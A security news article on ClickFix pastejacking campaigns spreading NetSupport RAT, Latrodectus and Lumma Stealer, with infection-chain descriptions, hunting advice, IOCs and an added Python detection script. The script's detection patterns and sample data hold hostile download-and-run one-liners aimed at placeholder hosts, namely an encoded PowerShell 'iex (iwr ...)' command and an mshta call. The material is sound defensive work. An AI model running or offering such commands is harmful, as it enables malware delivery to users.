GBHackers

Hackers Exploit ClickFix Tactics to Spread NetSupport RAT, Latrodectus, and Lumma Stealer


Attackers are increasingly leveraging the ClickFix social engineering technique to distribute potent malware families, including NetSupport RAT, Latrodectus, and Lumma Stealer.

This method, which emerged prominently in recent months, tricks users into executing malicious commands under the guise of resolving common computer issues like performance glitches or verification prompts.

By hijacking the clipboard through JavaScript injection, a tactic known as pastejacking, threat actors embed obfuscated PowerShell scripts or commands that victims unwittingly paste into system interfaces such as the Run dialog (Win+R) or a terminal opened from the Win+X menu.

This bypasses traditional security controls, as there’s no direct exploit or malicious download; instead, the user manually triggers the infection via trusted shells like cmd.exe or powershell.exe.

Palo Alto Networks’ Unit 42 has responded to nearly a dozen incidents in 2025 where ClickFix served as the initial access vector, affecting diverse sectors from high technology and financial services to manufacturing, utilities, and government entities.

The technique’s simplicity allows rapid deployment, enabling full organizational takeovers through credential theft, data exfiltration, or ransomware deployment.

Researchers have observed a surge in weekly infections since early 2025, with variants masquerading as legitimate services like DocuSign and Okta to evade detection.

Figure: The NetSupport RAT infection chain

In-Depth Analysis of Malware Campaigns

Delving into specific campaigns, one prolific operation in May 2025 targeted industries such as healthcare, legal services, telecommunications, retail, and mining by distributing NetSupport RAT via fake landing pages on domains like docusign.sa[.]com and oktacheck.it[.]com.

Figure: Fake landing page for Okta

These lures, suspected to use ClearFake infrastructure (a malicious JavaScript framework embedded in compromised sites), inject encoded PowerShell commands that download a ZIP archive containing jp2launcher.exe, a legitimate Java Runtime Environment component.

jp2launcher.exe sideloads a malicious DLL (msvcp140.dll), which then fetches and executes NetSupport RAT (client32.exe) from encrypted binaries, establishing remote access.

Similarly, Latrodectus campaigns from March to April 2025 shifted to ClickFix, redirecting users from hacked websites to verification pages that paste curl.exe commands downloading JavaScript droppers.

These, obfuscated with junk JSON variables, retrieve MSI payloads that sideload libcef.dll, injecting shellcode for persistence and potential follow-on payloads like infostealers.

In April 2025, Lumma Stealer attacks intensified, using typosquatted domains like iplogger[.]co to deliver MSHTA commands that fetch encoded PowerShell scripts, ultimately deploying PartyContinued.exe.

This extractor unpacks a CAB file (Boat.pst) to construct an AutoIt3 script engine (Slovenia[.]com), executing Lumma as an .a3x file for credential harvesting and exfiltration to C2 servers like sumeriavgv[.]digital.

These chains highlight evolving obfuscation, from Russian-commented scripts to dynamic R2.dev-hosted payloads, impacting automotive, energy, IT, and software sectors.

Mitigation Strategies

To counter these threats, threat hunters can scrutinize artifacts like the RunMRU registry key (HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which records commands entered into the Run dialog, for suspicious entries involving obfuscated commands or downloads from untrusted domains.

For Win+X variants, monitor Event ID 4688 (process creation) for powershell.exe spawned by explorer.exe, correlated with Event ID 4663 (object access) events on the WinX shortcut folders, alongside elevated shell sessions shortly after login and anomalous child processes like mshta.exe or rundll32.exe.
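The two hunts above (RunMRU triage and the 4688/4663 correlation) share one piece of logic: deciding whether a pasted command line looks like a ClickFix one-liner. The following is an added example, not code from the article or from Unit 42, that implements both hunts over data already pulled off the endpoint. It assumes the RunMRU key has been exported as a name-to-data dictionary (MRUList giving the order, each value ending in the literal `\1` that Windows appends) and that security events arrive as dictionaries with the field names shown; the sample key contents and events are constructed for the example. Commands carrying `-enc`/`-EncodedCommand` are base64-decoded as UTF-16LE so the hidden payload is scored too.

```python
"""Triage ClickFix artefacts: RunMRU entries and explorer.exe-spawned shells (added example)."""
import base64
import re
from datetime import datetime, timedelta

# Token classes that recur in ClickFix one-liners pasted into Win+R or a shell.
# Each pattern counts once; two or more classes in one command is treated as suspicious.
SUSPICIOUS = [
    r"\b(powershell|pwsh|mshta|curl|rundll32|certutil|bitsadmin)(\.exe)?\b",
    r"\biex\b|invoke-expression|downloadstring|invoke-webrequest|\biwr\b",
    r"-e(c|nc|ncodedcommand)?\s",          # -e / -ec / -enc / -EncodedCommand
    r"-w(indowstyle)?\s+hidden",
    r"-no?p(rofile)?\b",                   # -nop / -np / -NoProfile
    r"https?://",
    r"executionpolicy\s+bypass|-ep\s+bypass",
]
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
WINX_RE = re.compile(r"\\Microsoft\\Windows\\WinX\\", re.I)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


def decode_encoded_command(cmd):
    """Return the UTF-16LE script behind -enc/-EncodedCommand, or None if absent or malformed."""
    m = ENC_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command(cmd):
    """Count suspicious token classes in cmd and in any encoded payload it carries."""
    text = cmd
    decoded = decode_encoded_command(cmd)
    if decoded:
        text += "\n" + decoded
    hits = [p for p in SUSPICIOUS if re.search(p, text, re.I)]
    return {"hits": len(hits), "decoded": decoded, "suspicious": len(hits) >= 2}


def triage_runmru(values):
    """values: RunMRU key exported as {value_name: data}. Returns entries most-recent-first."""
    order = values.get("MRUList", "")
    names = list(order) + [n for n in values if n != "MRUList" and n not in order]
    out = []
    for name in names:
        raw = values[name]
        cmd = raw[:-2] if raw.endswith("\\1") else raw  # strip the trailing "\1" Windows appends
        out.append({"slot": name, "command": cmd, **score_command(cmd)})
    return out


def correlate_events(events, window=timedelta(seconds=30)):
    """Flag 4688 shell launches whose parent is explorer.exe (Win+R / Win+X launches),
    mark whether a 4663 access to a WinX folder preceded them within `window`,
    and score the command line. events: dicts with an ISO-8601 'time' field."""
    winx_times = [datetime.fromisoformat(e["time"]) for e in events
                  if e["event_id"] == 4663 and WINX_RE.search(e.get("object_name", ""))]
    alerts = []
    for e in events:
        if e["event_id"] != 4688:
            continue
        proc = e["new_process_name"].rsplit("\\", 1)[-1].lower()
        parent = e["parent_process_name"].rsplit("\\", 1)[-1].lower()
        if proc not in SHELLS or parent != "explorer.exe":
            continue
        t = datetime.fromisoformat(e["time"])
        preceded = any(t - window <= w <= t for w in winx_times)
        s = score_command(e.get("command_line", ""))
        alerts.append({"time": e["time"], "process": proc, "winx_menu": preceded,
                       "hits": s["hits"], "suspicious": s["suspicious"]})
    return alerts


# Constructed sample data (placeholder domains; not indicators from the article).
SAMPLE_SCRIPT = "iex (iwr 'https://verify.example.invalid/check')"
SAMPLE_ENC = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "calc\\1",
    "c": f"powershell -w hidden -nop -enc {SAMPLE_ENC}\\1",
}
SAMPLE_EVENTS = [
    {"event_id": 4663, "time": "2025-06-01T10:00:00",
     "object_name": "C:\\Users\\u\\AppData\\Local\\Microsoft\\Windows\\WinX\\Group3\\"},
    {"event_id": 4688, "time": "2025-06-01T10:00:05",
     "new_process_name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent_process_name": "C:\\Windows\\explorer.exe",
     "command_line": "powershell.exe -w hidden -ep bypass -c \"mshta https://lure.example.invalid/a\""},
    {"event_id": 4688, "time": "2025-06-01T10:03:00",
     "new_process_name": "C:\\Windows\\System32\\cmd.exe",
     "parent_process_name": "C:\\Windows\\System32\\svchost.exe", "command_line": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for entry in triage_runmru(SAMPLE_RUNMRU):
        print(entry["slot"], entry["suspicious"], entry["hits"], entry["command"][:60])
    for alert in correlate_events(SAMPLE_EVENTS):
        print(alert)
```

The threshold of two token classes is a starting point, not a rule: `powershell` alone appears in plenty of legitimate Run-dialog history, while `powershell` plus `-w hidden` or a URL almost never does. Score the decoded payload rather than only the outer command, because most ClickFix lures put everything interesting behind `-enc`.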

Clipboard monitoring can flag paste events preceding executions. Palo Alto Networks’ Advanced WildFire, URL Filtering, DNS Security, Cortex XDR, and XSIAM provide robust defenses by detecting clipboard injections and behavioral anomalies.

Organizations should educate users on these lures while implementing proactive monitoring. For suspected compromises, contact Unit 42’s incident response team.

Indicators of Compromise (IOCs)

SHA256 hashes (Lumma Stealer)
  2bc23b53bb76e59d84b0175e8cba68695a21ed74be9327f0b6ba37edc2daaeef  PartyContinued.exe
  06efe89da25a627493ef383f1be58c95c3c89a20ebb4af4696d82e729c75d1a7  Boat.pst (CAB file)

SHA256 hashes (Latrodectus)
  5809c889e7507d357e64ea15c7d7b22005dbf246aefdd3329d4a5c58d482e7e1  libecf.dll
  52e6e819720fede0d12dcc5430ff15f70b5656cbd3d5d251abfc2dcd22783293  PowerShell downloader

SHA256 hashes (NetSupport RAT)
  5C762FF1F604E92ECD9FD1DC5D1CB24B3AF4B4E0D25DE462C78F7AC0F897FC2D  data_3.bin (XOR-encrypted stager)
  9DCA5241822A0E954484D6C303475F94978B6EF0A016CBAE1FBA29D0AED86288  data_4.bin (XOR-encrypted shellcode)
  CBAF513E7FD4322B14ADCC34B34D793D79076AD310925981548E8D3CFF886527  msvcp140.dll (loader)
  506ab08d0a71610793ae2a5c4c26b1eb35fd9e3c8749cd63877b03c205feb48a  libsqlite3-0.dll
  3ACC40334EF86FD0422FB386CA4FB8836C4FA0E722A5FCFA0086B9182127C1D7  C:\ProgramData\SecurityCheck_v1\client32.exe

Mutex (NetSupport RAT)
  nx0kFgSPY8SDVhOMjmNgW  Loader mutex

C2 domains (NetSupport RAT)
  mh-sns[.]com, lasix20[.]com  Command-and-control domains
